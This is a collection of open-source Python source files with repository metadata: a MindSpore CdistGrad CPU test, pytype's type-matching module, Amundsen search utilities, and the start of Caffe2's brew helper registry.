if k % 10 == 0:
print(f"Written {k}/{len(items)} to {config['table_name']}")
|
5b6cbc2059d3161b66164d431c43cdde7fc17ef1
|
ffdc77394c5b5532b243cf3c33bd584cbdc65cb7
|
/tests/st/ops/cpu/test_cdist_grad_op.py
|
1e361754ba693a7d87def6f32da1341aade6aede
|
[
"Apache-2.0",
"LicenseRef-scancode-proprietary-license",
"MPL-1.0",
"OpenSSL",
"LGPL-3.0-only",
"LicenseRef-scancode-warranty-disclaimer",
"BSD-3-Clause-Open-MPI",
"MIT",
"MPL-2.0-no-copyleft-exception",
"NTP",
"BSD-3-Clause",
"GPL-1.0-or-later",
"0BSD",
"MPL-2.0",
"LicenseRef-scancode-free-unknown",
"AGPL-3.0-only",
"Libpng",
"MPL-1.1",
"IJG",
"GPL-2.0-only",
"BSL-1.0",
"Zlib",
"LicenseRef-scancode-public-domain",
"LicenseRef-scancode-python-cwi",
"BSD-2-Clause",
"LicenseRef-scancode-gary-s-brown",
"LGPL-2.1-only",
"LicenseRef-scancode-other-permissive",
"Python-2.0",
"LicenseRef-scancode-mit-nagy",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-unknown-license-reference",
"Unlicense"
] |
permissive
|
mindspore-ai/mindspore
|
ca7d5bb51a3451c2705ff2e583a740589d80393b
|
54acb15d435533c815ee1bd9f6dc0b56b4d4cf83
|
refs/heads/master
| 2023-07-29T09:17:11.051569
| 2023-07-17T13:14:15
| 2023-07-17T13:14:15
| 239,714,835
| 4,178
| 768
|
Apache-2.0
| 2023-07-26T22:31:11
| 2020-02-11T08:43:48
|
C++
|
UTF-8
|
Python
| false
| false
| 4,643
|
py
|
test_cdist_grad_op.py
|
# Copyright 2022 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import numpy as np
import pytest
import mindspore.nn as nn
from mindspore import Tensor
from mindspore import context
from mindspore.ops.operations import _grad_ops as G
from mindspore.ops.functional import vmap
context.set_context(mode=context.GRAPH_MODE, device_target="CPU")
class CdistGradTEST(nn.Cell):
def __init__(self, p):
super(CdistGradTEST, self).__init__()
self.cdist_grad = G.CdistGrad(p)
def construct(self, grad, x1, x2, dist):
return self.cdist_grad(grad, x1, x2, dist)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_CdistGradP0_float32():
"""
Feature: Cdist cpu kernel
Description: test the cdist p = 0.0.
Expectation: the output[0] is same as numpy
"""
cdist_grad = CdistGradTEST(3.)
grad = Tensor(np.array([[[1.0, 1.0], [2.0, 2.0]]]).astype(np.float32))
x1 = Tensor(np.array([[[1.0, 1.0], [2.0, 2.0]]]).astype(np.float32))
x2 = Tensor(np.array([[[3.0, 3.0], [3.0, 3.0]]]).astype(np.float32))
dist = Tensor(np.array([[[3.0, 3.0], [3.0, 3.0]]]).astype(np.float32))
output = cdist_grad(grad, x1, x2, dist)
expect = np.array(
[[[-0.8888889, -0.8888889], [-0.44444445, -0.44444445]]]).astype(np.float32)
print(output)
np.testing.assert_allclose(output.asnumpy(), expect, rtol=1e-3)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_vmap():
"""
Feature: cdist vmap.
Description: test the rightness of cdist vmap feature.
Expectation: Success.
"""
def cal_cdist_grad(grad, x1, x2, dist):
return G.CdistGrad(3.0)(grad, x1, x2, dist)
grad = Tensor(np.array([[[1.0, 1.0], [2.0, 2.0]], [[1.0, 1.0], [2.0, 2.0]]]).astype(np.float32))
x1 = Tensor(np.array([[[1.0, 1.0], [2.0, 2.0]], [[1.0, 1.0], [2.0, 2.0]]]).astype(np.float32))
x2 = Tensor(np.array([[[3.0, 3.0], [3.0, 3.0]], [[3.0, 3.0], [3.0, 3.0]]]).astype(np.float32))
dist = Tensor(np.array([[[3.0, 3.0], [3.0, 3.0]], [[3.0, 3.0], [3.0, 3.0]]]).astype(np.float32))
expect = np.array(
[[[-0.8888889, -0.8888889], [-0.44444445, -0.44444445]],
[[-0.8888889, -0.8888889], [-0.44444445, -0.44444445]]]).astype(np.float32)
vmap_ceil = vmap(cal_cdist_grad, in_axes=(0), out_axes=0)
output = vmap_ceil(grad, x1, x2, dist)
np.testing.assert_allclose(output.asnumpy(), expect, rtol=1e-3)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_vmap2():
"""
Feature: cdist vmap.
Description: test the rightness of cdist vmap feature.
Expectation: Success.
"""
def cal_cdist_grad(grad, x1, x2, dist):
return G.CdistGrad(3.0)(grad, x1, x2, dist)
grad = Tensor(np.array([[[[1.0, 1.0], [2.0, 2.0]], [[1.0, 1.0], [2.0, 2.0]]],
[[[1.0, 1.0], [2.0, 2.0]], [[1.0, 1.0], [2.0, 2.0]]]]).astype(np.float32))
x1 = Tensor(np.array([[[[1.0, 1.0], [2.0, 2.0]], [[1.0, 1.0], [2.0, 2.0]]],
[[[1.0, 1.0], [2.0, 2.0]], [[1.0, 1.0], [2.0, 2.0]]]]).astype(np.float32))
x2 = Tensor(np.array([[[[3.0, 3.0], [3.0, 3.0]], [[3.0, 3.0], [3.0, 3.0]]],
[[[3.0, 3.0], [3.0, 3.0]], [[3.0, 3.0], [3.0, 3.0]]]]).astype(np.float32))
dist = Tensor(np.array([[[[3.0, 3.0], [3.0, 3.0]], [[3.0, 3.0], [3.0, 3.0]]],
[[[3.0, 3.0], [3.0, 3.0]], [[3.0, 3.0], [3.0, 3.0]]]]).astype(np.float32))
expect = np.array(
[[[[-0.8888889, -0.8888889], [-0.44444445, -0.44444445]],
[[-0.8888889, -0.8888889], [-0.44444445, -0.44444445]]],
[[[-0.8888889, -0.8888889], [-0.44444445, -0.44444445]],
[[-0.8888889, -0.8888889], [-0.44444445, -0.44444445]]]]).astype(np.float32)
vmap_ceil = vmap(vmap(cal_cdist_grad, in_axes=(
0), out_axes=0), in_axes=(0), out_axes=0)
output = vmap_ceil(grad, x1, x2, dist)
np.testing.assert_allclose(output.asnumpy(), expect, rtol=1e-3)
|
d38188d6f38e3f7661f7f8ad11b0a84a3373706e
|
6b27c39edc10b1353104043b7a523f4981c99ef2
|
/pytype/pytd/type_match.py
|
6e24aaa1a42192591c5018b3764e51fcb05c9c90
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
google/pytype
|
ad0ff0b6c1083b4f0a1af1747869d422f2b5f4d8
|
bda0b9547af9a084bb2bd1427f58dcde968e48b5
|
refs/heads/main
| 2023-08-26T17:52:23.546035
| 2023-08-24T22:48:00
| 2023-08-24T22:48:00
| 32,483,713
| 4,595
| 367
|
NOASSERTION
| 2023-09-13T04:40:45
| 2015-03-18T20:52:08
|
Python
|
UTF-8
|
Python
| false
| false
| 21,616
|
py
|
type_match.py
|
"""Match pytd types against each other.
"Matching" x against y means roughly: If we have a function f(param: y) and
a type x, would we be able to pass (an instance of) x to f. (I.e.,
"execute f(x)"). So for example, str would "match" against basestring, and
list[int] would match against list[Number].
This is used for converting structural types to nominal types during type
inference, but could also be used when merging pytd files, to match existing
signatures against new inference results.
"""
import logging
from typing import Dict, Optional, Union
import attrs
from pytype import utils
from pytype.pytd import booleq
from pytype.pytd import escape
from pytype.pytd import pytd
from pytype.pytd import pytd_utils
from pytype.pytd import visitors
from pytype.pytd.parse import node
log = logging.getLogger(__name__)
is_complete = escape.is_complete
_SubstType = Dict[pytd.TypeParameter, Optional[pytd.Type]]
# This should be kept in sync with is_unknown below.
_UnknownType = Union[pytd.ClassType, pytd.NamedType, pytd.Class, "StrictType"]
# Might not be needed anymore once pytd has builtin support for ~unknown.
def is_unknown(t):
"""Return True if this is an ~unknown."""
if isinstance(t, (pytd.ClassType, pytd.NamedType, pytd.Class, StrictType)):
return escape.is_unknown(t.name)
elif isinstance(t, str):
return escape.is_unknown(t)
else:
return False
def get_all_subclasses(asts):
"""Compute a class->subclasses mapping.
Args:
asts: A list of ASTs.
Returns:
A dictionary, mapping instances of pytd.Type (types) to lists of
pytd.Class (the derived classes).
"""
hierarchy = {}
for ast in asts:
hierarchy.update(ast.Visit(visitors.ExtractSuperClasses()))
def filter_superclasses(superclasses):
return [superclass for superclass in superclasses
if is_complete(superclass)]
hierarchy = {cls: filter_superclasses(superclasses)
for cls, superclasses in hierarchy.items() if is_complete(cls)}
# typically this is a fairly short list, e.g.:
# [ClassType(basestring), ClassType(int), ClassType(object)]
return utils.invert_dict(hierarchy)
@attrs.frozen(slots=True, cache_hash=True)
class StrictType(node.Node):
"""A type that doesn't allow sub- or superclasses to match.
For example, "int" is considered a valid argument for a function that accepts
"object", but StrictType("int") is not.
"""
name: str
def __str__(self):
return self.name
class TypeMatch(pytd_utils.TypeMatcher):
"""Class for matching types against other types."""
def __init__(self, direct_subclasses=None, any_also_is_bottom=True):
"""Construct.
Args:
direct_subclasses: A dictionary, mapping pytd.Type to lists of pytd.Type.
any_also_is_bottom: Whether we should, (if True) consider
pytd.AnythingType() to also be at the bottom of the type hierarchy,
thus making it a subclass of everything, or (if False) to be only
at the top.
"""
self.direct_subclasses = direct_subclasses or {}
self.any_also_is_bottom = any_also_is_bottom
self.solver = booleq.Solver()
self._implications = {}
def default_match(self, t1, t2, *unused_args, **unused_kwargs):
# Don't allow pytd_utils.TypeMatcher to do default matching.
raise AssertionError(
f"Can't compare {type(t1).__name__} and {type(t2).__name__}")
def get_superclasses(self, t):
"""Get all base classes of this type.
Args:
t: A pytd.Type
Returns:
A list of pytd.Type.
"""
if isinstance(t, pytd.ClassType):
return sum((self.get_superclasses(c) for c in t.cls.bases), [t])
elif isinstance(t, pytd.AnythingType):
# All types, even "?", inherit from object.
return [pytd.NamedType("builtins.object")]
elif isinstance(t, pytd.GenericType):
return self.get_superclasses(t.base_type)
else:
log.warning("Can't extract superclasses from %s", type(t))
return [pytd.NamedType("builtins.object")]
def get_subclasses(self, t):
"""Get all classes derived from this type.
Args:
t: A pytd.Type
Returns:
A list of pytd.Type.
"""
if isinstance(t, pytd.ClassType):
subclasses = self.direct_subclasses.get(t, [])
return sum((self.get_subclasses(pytd.ClassType(c.name, c))
for c in subclasses), [t])
else:
raise NotImplementedError(f"Can't extract subclasses from {type(t)}")
def type_parameter(
self, unknown: _UnknownType, base_class: pytd.Class,
item: pytd.TemplateItem) -> StrictType:
"""This generates the type parameter when matching against a generic type.
For example, when we match ~unknown1 against list[T], we need an additional
type to model the T in "~unknown1[T]". This type would have the name
"~unknown1.list.T".
Args:
unknown: An unknown type. This is the type that's matched against
base_class[T].
base_class: The base class of the generic we're matching the unknown
against. E.g. "list".
item: The actual type parameter. ("T" in the examples above).
Returns:
A type (pytd.Node) to represent this type parameter.
"""
assert is_unknown(unknown)
name = unknown.name + "." + base_class.name + "." + item.type_param.name
# We do *not* consider subclasses or superclasses when matching type
# parameters.
# So for example, if we pass list[int] to f(x: list[T]), we assume that
# T can only be "int", not "int + object". This might be considered
# incorrect, but typically gives us more intuitive results.
# Note that this only happens if we match ~unknown against generic types,
# not for matching of "known" types against each other.
return StrictType(name)
def _get_parameters(self, t1, t2):
if isinstance(t1, pytd.TupleType) and isinstance(t2, pytd.TupleType):
# No change needed; the parameters will be compared element-wise.
return t1.parameters, t2.parameters
elif isinstance(t2, pytd.TupleType):
# Since we call _get_parameters after confirming that t1 and t2 have
# compatible base types, t1 is a homogeneous tuple here.
return (t1.element_type,) * len(t2.parameters), t2.parameters
elif isinstance(t1, pytd.TupleType):
return (pytd_utils.JoinTypes(t1.parameters),), t2.parameters
elif (isinstance(t1, pytd.CallableType) and
isinstance(t2, pytd.CallableType)):
# Flip the arguments, since argument types are contravariant.
return t2.args + (t1.ret,), t1.args + (t2.ret,)
elif (t1.base_type.cls.name == "builtins.type" and
t2.base_type.cls.name == "typing.Callable"):
# We'll only check the return type, since getting the argument types for
# initializing a class is tricky.
return t1.parameters, (t2.parameters[-1],)
elif (t1.base_type.cls.name == "typing.Callable" and
t2.base_type.cls.name == "builtins.type"):
return (t1.parameters[-1],), t2.parameters
elif isinstance(t1, pytd.CallableType):
# We're matching against GenericType(Callable, (Any, _RET)), so we don't
# need the argument types.
return (pytd.AnythingType(), t1.ret), t2.parameters
elif isinstance(t2, pytd.CallableType):
return t1.parameters, (pytd.AnythingType(), t2.ret)
else:
num_extra_params = len(t1.parameters) - len(t2.parameters)
# Matching, e.g., Dict[str, int] against Iterable[K] is legitimate.
assert num_extra_params >= 0, (t1.base_type.cls.name,
t2.base_type.cls.name)
t2_parameters = t2.parameters + (pytd.AnythingType(),) * num_extra_params
return t1.parameters, t2_parameters
def match_Generic_against_Generic( # pylint: disable=invalid-name
self, t1: pytd.GenericType, t2: pytd.GenericType, subst: _SubstType,
) -> booleq.BooleanTerm:
"""Match a pytd.GenericType against another pytd.GenericType."""
assert isinstance(t1.base_type, pytd.ClassType), type(t1.base_type)
assert isinstance(t2.base_type, pytd.ClassType), type(t2.base_type)
base1 = pytd.ClassType(t1.base_type.cls.name, t1.base_type.cls)
base2 = pytd.ClassType(t2.base_type.cls.name, t2.base_type.cls)
base_type_cmp = self.match_type_against_type(base1, base2, subst)
if base_type_cmp is booleq.FALSE:
return booleq.FALSE
t1_parameters, t2_parameters = self._get_parameters(t1, t2)
if len(t1_parameters) != len(t2_parameters):
return booleq.FALSE
# Type parameters are covariant:
# E.g. passing list[int] as argument for list[object] succeeds.
param_cmp = [self.match_type_against_type(p1, p2, subst)
for p1, p2 in zip(t1_parameters, t2_parameters)]
return booleq.And([base_type_cmp] + param_cmp)
def match_Unknown_against_Generic( # pylint: disable=invalid-name
self, t1: _UnknownType, t2: pytd.GenericType, subst: _SubstType
) -> booleq.BooleanTerm:
assert isinstance(t2.base_type, pytd.ClassType)
# No inheritance for base classes - you can only inherit from an
# instantiated template, but not from a template itself.
base_match = booleq.Eq(t1.name, t2.base_type.cls.name)
type_params = [self.type_parameter(t1, t2.base_type.cls, item)
for item in t2.base_type.cls.template]
for type_param in type_params:
self.solver.register_variable(type_param.name)
if isinstance(t2, pytd.TupleType):
t2_parameters = (pytd_utils.JoinTypes(t2.parameters),)
else:
t2_parameters = t2.parameters
params = [self.match_type_against_type(p1, p2, subst)
for p1, p2 in zip(type_params, t2_parameters)]
return booleq.And([base_match] + params)
def match_Generic_against_Unknown(self, t1, t2, subst): # pylint: disable=invalid-name
# Note: This flips p1 and p2 above.
return self.match_Unknown_against_Generic(t2, t1, subst) # pylint: disable=arguments-out-of-order
def maybe_lookup_type_param(self, t, subst):
while isinstance(t, pytd.TypeParameter):
# We can only have type parameters in a class, and if so, we should have
# added them to the type parameter substitution map (subst) beforehand:
assert t in subst
if subst[t] is None:
# Function type parameter. Can be anything.
t = pytd.AnythingType()
else:
assert subst[t] != t, "Cyclic type parameter."
t = subst[t]
return t
def unclass(self, t):
"""Prevent further subclass or superclass expansion for this type."""
if isinstance(t, pytd.ClassType):
# When t.name and t.cls.name differ (e.g., int vs. builtins.int), the
# latter is the complete name.
return pytd.NamedType(t.cls.name)
else:
return t
def expand_superclasses(self, t):
class_and_superclasses = self.get_superclasses(t)
return [self.unclass(t) for t in class_and_superclasses]
def expand_subclasses(self, t):
class_and_subclasses = self.get_subclasses(t)
return [self.unclass(t) for t in class_and_subclasses]
def match_type_against_type(self, t1, t2, subst):
types = (t1, t2, frozenset(subst.items()))
if types in self._implications:
return self._implications[types]
implication = self._implications[types] = self._match_type_against_type(
t1, t2, subst)
return implication
def _full_name(self, t):
return t.name
def _match_type_against_type(self, t1, t2, subst):
"""Match a pytd.Type against another pytd.Type."""
t1 = self.maybe_lookup_type_param(t1, subst)
t2 = self.maybe_lookup_type_param(t2, subst)
# TODO(b/159058933): Use utils:TypeMatcher to simplify this?
if isinstance(t2, pytd.AnythingType):
# We can match anything against AnythingType. (It's like top)
return booleq.TRUE
elif isinstance(t1, pytd.AnythingType):
if self.any_also_is_bottom:
# We can match AnythingType against everything. (It's like bottom)
return booleq.TRUE
else:
return booleq.FALSE
elif isinstance(t1, pytd.NothingType):
# nothing as an actual type matches against everything, since it
# represents an empty value.
return booleq.TRUE
elif isinstance(t2, pytd.NothingType):
# We can't match anything against nothing as an expected type (except
# nothing itself, above).
return booleq.FALSE
elif isinstance(t1, pytd.UnionType):
return booleq.And(self.match_type_against_type(u, t2, subst)
for u in t1.type_list)
elif isinstance(t2, pytd.UnionType):
return booleq.Or(self.match_type_against_type(t1, u, subst)
for u in t2.type_list)
elif (isinstance(t1, pytd.ClassType) and isinstance(t2, StrictType) or
isinstance(t1, StrictType) and isinstance(t2, pytd.ClassType)):
# For strict types, avoid subclasses of the left side.
return booleq.Eq(self._full_name(t1), self._full_name(t2))
elif isinstance(t1, pytd.ClassType) and t2.name == "builtins.object":
return booleq.TRUE
elif (t1.name in ("builtins.type", "typing.Callable") and
t2.name in ("builtins.type", "typing.Callable")):
return booleq.TRUE
elif isinstance(t1, pytd.ClassType):
# ClassTypes are similar to Unions, except they're disjunctions: We can
# match the type or any of its base classes against the formal parameter.
return booleq.Or(self.match_type_against_type(t, t2, subst)
for t in self.expand_superclasses(t1))
elif isinstance(t2, pytd.ClassType):
# ClassTypes on the right are exactly like Unions: We can match against
# this type or any of its subclasses.
return booleq.Or(self.match_type_against_type(t1, t, subst)
for t in self.expand_subclasses(t2))
assert not isinstance(t1, pytd.ClassType)
assert not isinstance(t2, pytd.ClassType)
if is_unknown(t1) and isinstance(t2, pytd.GenericType):
return self.match_Unknown_against_Generic(t1, t2, subst)
elif isinstance(t1, pytd.GenericType) and is_unknown(t2):
return self.match_Generic_against_Unknown(t1, t2, subst)
elif isinstance(t1, pytd.GenericType) and isinstance(t2, pytd.GenericType):
return self.match_Generic_against_Generic(t1, t2, subst)
elif isinstance(t1, pytd.GenericType):
# E.g. list[...] matches against list, or even object.
return self.match_type_against_type(t1.base_type, t2, subst)
elif isinstance(t2, pytd.GenericType):
if self.any_also_is_bottom:
# E.g. list (a.k.a. list[Any]) matches against list[str]
return self.match_type_against_type(t1, t2.base_type, subst)
else:
return booleq.FALSE
elif is_unknown(t1) and is_unknown(t2):
return booleq.Eq(t1.name, t2.name)
elif (isinstance(t1, (pytd.NamedType, StrictType)) and
isinstance(t2, (pytd.NamedType, StrictType))):
if is_complete(t1) and is_complete(t2) and t1.name != t2.name:
# Optimization: If we know these two can never be equal, just return
# false right away.
return booleq.FALSE
else:
return booleq.Eq(t1.name, t2.name)
elif isinstance(t1, pytd.NamedType) and isinstance(t2, pytd.Literal):
return booleq.FALSE
elif isinstance(t1, pytd.LateType) or isinstance(t2, pytd.LateType):
# Unresolved types never match against anything.
return booleq.FALSE
elif isinstance(t1, pytd.Literal) and isinstance(t2, pytd.Literal):
return booleq.TRUE if t1.value == t2.value else booleq.FALSE
else:
raise AssertionError(f"Don't know how to match {type(t1)} against "
f"{type(t2)}")
# pylint: disable=invalid-name
def match_Signature_against_Signature(self, sig1, sig2, subst,
skip_self=False):
"""Match a pytd.Signature against another pytd.Signature.
Args:
sig1: The caller
sig2: The callee
subst: Current type parameters.
skip_self: If True, doesn't compare the first parameter, which is
considered (and verified) to be "self".
Returns:
An instance of booleq.BooleanTerm, i.e. a boolean formula.
"""
# Signatures have type parameters, too. We ignore them, since they can
# be anything. (See maybe_lookup_type_param())
subst.update({p.type_param: None for p in sig1.template + sig2.template})
params1 = sig1.params
params2 = sig2.params
if skip_self:
# Methods in an ~unknown need to declare their methods with "self"
assert params1 and params1[0].name == "self"
params1 = params1[1:]
if params2 and params2[0].name == "self":
params2 = params2[1:]
equalities = []
if len(params1) > len(params2) and not sig2.has_optional:
return booleq.FALSE # extra parameters
if sig1.starargs is not None and sig2.starargs is not None:
equalities.append(self.match_type_against_type(
sig1.starargs.type, sig2.starargs.type, subst))
if sig1.starstarargs is not None and sig2.starstarargs is not None:
equalities.append(self.match_type_against_type(
sig1.starstarargs.type, sig2.starstarargs.type, subst))
# TODO(b/159058933): Handle kwonly parameters (on either side). Presumably,
# a kwonly on the left side means that it was a keyword param.
for p1, p2 in zip(params1, params2):
if p1.optional and not p2.optional:
return booleq.FALSE
for i, p2 in enumerate(params2):
if i >= len(params1):
if not p2.optional:
return booleq.FALSE # missing parameter
else:
pass
else:
p1 = params1[i]
if p1.name != p2.name and not (
pytd_utils.ANON_PARAM.match(p1.name) or
pytd_utils.ANON_PARAM.match(p2.name)):
return booleq.FALSE
equalities.append(self.match_type_against_type(p1.type, p2.type, subst))
equalities.append(
self.match_type_against_type(
sig1.return_type, sig2.return_type, subst))
return booleq.And(equalities)
def match_Signature_against_Function(self, sig, f, subst, skip_self=False): # pylint: disable=invalid-name
def make_or(inner):
return booleq.Or(
self.match_Signature_against_Signature(inner, s, subst, skip_self)
for s in f.signatures)
return booleq.And(make_or(inner) for inner in visitors.ExpandSignature(sig))
def match_Function_against_Function(self, f1, f2, subst, skip_self=False): # pylint: disable=invalid-name
return booleq.And(
self.match_Signature_against_Function(s1, f2, subst, skip_self)
for s1 in f1.signatures)
def match_Function_against_Class(self, f1, cls2, subst, cache):
cls2_methods = cache.get(id(cls2))
if cls2_methods is None:
cls2_methods = cache[id(cls2)] = {f.name: f for f in cls2.methods}
if f1.name not in cls2_methods:
# The class itself doesn't have this method, but base classes might.
# TODO(b/159058933): This should do MRO order, not depth-first.
for base in cls2.bases:
if isinstance(base, pytd.AnythingType):
# AnythingType can contain any method. However, that would mean that
# a class that inherits from AnythingType contains any method
# imaginable, and hence is a match for anything. To prevent the bad
# results caused by that, return FALSE here.
return booleq.FALSE
elif isinstance(base, (pytd.ClassType, pytd.GenericType)):
if isinstance(base, pytd.ClassType):
cls = base.cls
values = tuple(pytd.AnythingType() for _ in cls.template)
elif isinstance(base, pytd.TupleType):
cls = base.base_type.cls
values = (pytd_utils.JoinTypes(base.parameters),)
else:
cls = base.base_type.cls
values = base.parameters
if values:
subst = subst.copy()
for param, value in zip(cls.template, values):
subst[param.type_param] = value
implication = self.match_Function_against_Class(f1, cls, subst, cache)
if implication is not booleq.FALSE:
return implication
else:
# Funky types like UnionType are hard to match against (and shouldn't
# appear as a base class) so we treat them as catch-all.
log.warning("Assuming that %s has method %s",
pytd_utils.Print(base), f1.name)
return booleq.TRUE
return booleq.FALSE
else:
f2 = cls2_methods[f1.name]
return self.match_Function_against_Function(
f1, f2, subst, skip_self=True)
def match_Class_against_Class(self, cls1, cls2, subst): # pylint: disable=invalid-name
"""Match a pytd.Class against another pytd.Class."""
return self.match_Functions_against_Class(
cls1.methods, cls2, subst)
def match_Protocol_against_Unknown(self, protocol, unknown, subst): # pylint: disable=invalid-name
"""Match a typing.Protocol against an unknown class."""
filtered_methods = [f for f in protocol.methods if f.is_abstract]
return self.match_Functions_against_Class(
filtered_methods, unknown, subst)
def match_Functions_against_Class(self, methods, cls2, subst):
implications = []
cache = {}
for f1 in methods:
implication = self.match_Function_against_Class(f1, cls2, subst, cache)
implications.append(implication)
if implication is booleq.FALSE:
break
# TODO(b/159058933): class attributes
return booleq.And(implications)
|
62332bdbc0de79f9481dd77afc0838cc15d552fa
|
fa1ad2e2ac7e376fc7cb3b3a6e1bb88eed3e80be
|
/govern/data-meta/amundsen/frontend/amundsen_application/api/utils/search_utils.py
|
f582a57b2836cab400faa95038a708cbe327ff18
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause",
"MIT"
] |
permissive
|
alldatacenter/alldata
|
7bc7713c9f1d56ad6b8e59ea03206d1073b7e047
|
8d5f9a2d49ab8f9e85ccf058cb02c2fda287afc6
|
refs/heads/master
| 2023-08-05T07:32:25.442740
| 2023-08-03T13:17:24
| 2023-08-03T13:17:24
| 213,321,771
| 774
| 250
|
Apache-2.0
| 2023-09-06T17:35:32
| 2019-10-07T07:36:18
| null |
UTF-8
|
Python
| false
| false
| 5,040
|
py
|
search_utils.py
|
# Copyright Contributors to the Amundsen project.
# SPDX-License-Identifier: Apache-2.0
import logging
from typing import Dict, List # noqa: F401
from http import HTTPStatus
from flask import current_app as app
from amundsen_application.api.utils.request_utils import request_search
from amundsen_common.models.search import Filter, SearchRequest
from amundsen_application.models.user import dump_user, load_user
LOGGER = logging.getLogger(__name__)
# These can move to a configuration when we have custom use cases outside of these default values
valid_search_fields = {
'table': {
'badges',
'column',
'database',
'schema',
'table',
'tag'
},
'dashboard': {
'group_name',
'name',
'product',
'tag'
},
'feature': {
'badges',
'entity',
'feature_name',
'feature_group',
'tags'
}
}
def map_dashboard_result(result: Dict) -> Dict:
return {
'type': 'dashboard',
'key': result.get('key', None),
'uri': result.get('uri', None),
'url': result.get('url', None),
'group_name': result.get('group_name', None),
'name': result.get('name', None),
'product': result.get('product', None),
'tag': result.get('tag', None),
'description': result.get('description', None),
'last_successful_run_timestamp': result.get('last_successful_run_timestamp', None),
'highlight': result.get('highlight', {}),
}
def map_table_result(result: Dict) -> Dict:
name = result.get('name') if result.get('name') else result.get('table')
return {
'type': 'table',
'key': result.get('key', None),
'name': name,
'cluster': result.get('cluster', None),
'description': result.get('description', None),
'database': result.get('database', None),
'schema': result.get('schema', None),
'schema_description': result.get('schema_description', None),
'badges': result.get('badges', None),
'last_updated_timestamp': result.get('last_updated_timestamp', None),
'highlight': result.get('highlight', None),
}
def map_feature_result(result: Dict) -> Dict:
return {
'type': 'feature',
'description': result.get('description', None),
'key': result.get('key', None),
'last_updated_timestamp': result.get('last_updated_timestamp', None),
'name': result.get('feature_name', None),
'feature_group': result.get('feature_group', None),
'version': result.get('version', None),
'availability': result.get('availability', None),
'entity': result.get('entity', None),
'badges': result.get('badges', None),
'status': result.get('status', None),
'highlight': result.get('highlight', {}),
}
def map_user_result(result: Dict) -> Dict:
user_result = dump_user(load_user(result))
user_result['type'] = 'user'
user_result['highlight'] = result.get('highlight', {})
return user_result
def generate_query_json(*, filters: Dict = {}, page_index: int, search_term: str) -> Dict:
"""
Transforms the given paramaters to the query json for the search service according to
the api defined at:
https://github.com/lyft/amundsensearchlibrary/blob/master/search_service/api/swagger_doc/table/search_table_filter.yml
https://github.com/lyft/amundsensearchlibrary/blob/master/search_service/api/swagger_doc/dashboard/search_dashboard_filter.yml
"""
return {
'page_index': int(page_index),
'search_request': {
'type': 'AND',
'filters': filters
},
'query_term': search_term
}
def execute_search_document_request(request_json: str, method: str) -> int:
search_service_base = app.config['SEARCHSERVICE_BASE']
search_document_url = f'{search_service_base}/v2/document'
update_response = request_search(
url=search_document_url,
method=method,
headers={'Content-Type': 'application/json'},
data=request_json,
)
status_code = update_response.status_code
if status_code != HTTPStatus.OK:
LOGGER.info(f'Failed to execute {method} for {request_json} in searchservice, status code: {status_code}')
LOGGER.info(update_response.text)
return status_code
def generate_query_request(*, filters: List[Filter] = [],
resources: List[str] = [],
page_index: int = 0,
results_per_page: int = 10,
search_term: str,
highlight_options: Dict) -> SearchRequest:
return SearchRequest(query_term=search_term,
resource_types=resources,
page_index=page_index,
results_per_page=results_per_page,
filters=filters,
highlight_options=highlight_options)
|
72556d93b5cb2de0673008b8a481d044ef78ed70
|
fbbe424559f64e9a94116a07eaaa555a01b0a7bb
|
/pytorch/source/caffe2/python/brew.py
|
bb6d3f0c3fcf9d6715cd4b6d41cc59e92e4ea353
|
[
"MIT"
] |
permissive
|
ryfeus/lambda-packs
|
6544adb4dec19b8e71d75c24d8ed789b785b0369
|
cabf6e4f1970dc14302f87414f170de19944bac2
|
refs/heads/master
| 2022-12-07T16:18:52.475504
| 2022-11-29T13:35:35
| 2022-11-29T13:35:35
| 71,386,735
| 1,283
| 263
|
MIT
| 2022-11-26T05:02:14
| 2016-10-19T18:22:39
|
Python
|
UTF-8
|
Python
| false
| false
| 4,417
|
py
|
brew.py
|
## @package model_helper_api
# Module caffe2.python.model_helper_api
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import sys
import copy
import inspect
from past.builtins import basestring
from caffe2.python.model_helper import ModelHelper
# flake8: noqa
from caffe2.python.helpers.algebra import *
from caffe2.python.helpers.arg_scope import *
from caffe2.python.helpers.array_helpers import *
from caffe2.python.helpers.control_ops import *
from caffe2.python.helpers.conv import *
from caffe2.python.helpers.db_input import *
from caffe2.python.helpers.dropout import *
from caffe2.python.helpers.elementwise_linear import *
from caffe2.python.helpers.fc import *
from caffe2.python.helpers.nonlinearity import *
from caffe2.python.helpers.normalization import *
from caffe2.python.helpers.pooling import *
from caffe2.python.helpers.tools import *
from caffe2.python.helpers.train import *
class HelperWrapper(object):
_registry = {
'arg_scope': arg_scope,
'fc': fc,
'packed_fc': packed_fc,
'fc_decomp': fc_decomp,
'fc_sparse': fc_sparse,
'fc_prune': fc_prune,
'dropout': dropout,
'max_pool': max_pool,
'average_pool': average_pool,
'max_pool_with_index' : max_pool_with_index,
'lrn': lrn,
'softmax': softmax,
'instance_norm': instance_norm,
'spatial_bn': spatial_bn,
'spatial_gn': spatial_gn,
'relu': relu,
'prelu': prelu,
'tanh': tanh,
'concat': concat,
'depth_concat': depth_concat,
'sum': sum,
'transpose': transpose,
'iter': iter,
'accuracy': accuracy,
'conv': conv,
'conv_nd': conv_nd,
'conv_transpose': conv_transpose,
'group_conv': group_conv,
'group_conv_deprecated': group_conv_deprecated,
'image_input': image_input,
'video_input': video_input,
'add_weight_decay': add_weight_decay,
'elementwise_linear': elementwise_linear,
'layer_norm': layer_norm,
'batch_mat_mul' : batch_mat_mul,
'cond' : cond,
'loop' : loop,
'db_input' : db_input,
}
def __init__(self, wrapped):
self.wrapped = wrapped
